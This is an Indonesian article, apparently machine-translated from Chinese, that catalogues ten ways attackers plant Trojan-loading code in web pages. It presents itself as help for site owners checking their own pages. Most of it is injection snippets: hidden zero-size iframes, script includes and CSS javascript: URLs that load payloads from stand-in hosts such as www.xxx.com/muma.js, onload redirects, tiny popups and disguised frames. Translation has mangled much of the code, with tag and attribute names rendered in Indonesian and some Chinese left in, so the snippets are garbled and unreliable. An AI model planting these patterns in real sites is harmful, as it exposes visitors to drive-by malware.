Artikel ini memberi tahu Anda metode yang sering digunakan orang jahat untuk menggantung Trojan di halaman web, sehingga Anda dapat mencegah halaman web Anda sendiri Selama Anda mendeteksi tempat-tempat yang sering digunakan untuk menggantung Trojan, lokasinya mudah ditemukan dari Trojan.
1: Bingkai kuda gantung
<iframe src=lebar alamat=0 tinggi=0></iframe>
Anda dapat memasukkan tautan situs web berbahaya di alamatnya, dll.
Dua: pemasangan file js
Selama itu adalah file JS, itu dapat dimodifikasi secara berbahaya dan dengan demikian ditautkan ke kode berbahaya. Umumnya, kode JS yang direferensikan oleh seluruh situs kemungkinan besar ditautkan ke Trojan horse. Untuk deteksi, kita dapat melihat kiri atau bawah kode JS. Orang jahat suka menggabungkan kode berbahaya dengan kode Normal yang disembunyikan dengan banyak spasi atau tanda kutip, jadi Anda harus memeriksa apakah halaman kode JS sengaja diregangkan.
Tiga: enkripsi deformasi js
<Bahasa SCRIPT=JScript.Encode src=http://www.xxx.com/muma.txt></script>
muma.txt dapat diubah ke akhiran apa pun
Empat: kuda gantung badan
<body onload=window.location='address';></body>
Lima: Kuda gantung yang tersembunyi
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';
Enam: Kuda tergantung di css
tubuh {
gambar latar belakang: url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}
Cara ini lebih kejam dan sulit dideteksi.
Tujuh : Kuda gantung JAJA
<Bahasa SKRIP=javascript>
window.open (alamat,,bilah alat=tidak,lokasi=tidak,direktori=tidak,status=tidak,bilah menu=tidak,bilah gulir=tidak,lebar=1,tinggi=1);
</skrip>
Kedelapan: Penyamaran gambar
<html>
<iframe src=网马地址 tinggi=0 lebar=0></iframe>
<img src=alamat gambar></pusat>
</html>
Sembilan: Panggilan penyamaran
<baris frameset=444,0 kolom=*>
<frame src=Buka halaman web framorder=tidak ada pengguliran=auto noresize marginwidth=0margingheight=0>
<frame src=网马地址 frameborder=tidak ada pengguliran=tidak ada ukuran marginwidth=0margingheight=0>
</bingkai>
Sepuluh: Penipuan Tingkat Lanjut
<a href=http://www.163.com (membingungkan alamat koneksi dan menunjukkan bahwa alamat ini menunjuk ke alamat Trojan) onMouseOver=www_163_com();> Konten yang akan ditampilkan pada halaman</a>
<Bahasa SKRIP=JavaScript>
fungsi www_163_com()
{
var url=alamat kuda bersih;
open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10, atas=10);
}
</SKRIP>